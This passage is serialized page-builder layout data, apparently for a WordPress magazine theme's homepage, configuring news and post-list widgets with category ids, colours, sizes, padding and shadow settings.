screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"5\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"3\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"7\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"48.082\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"8\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"51.918\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-li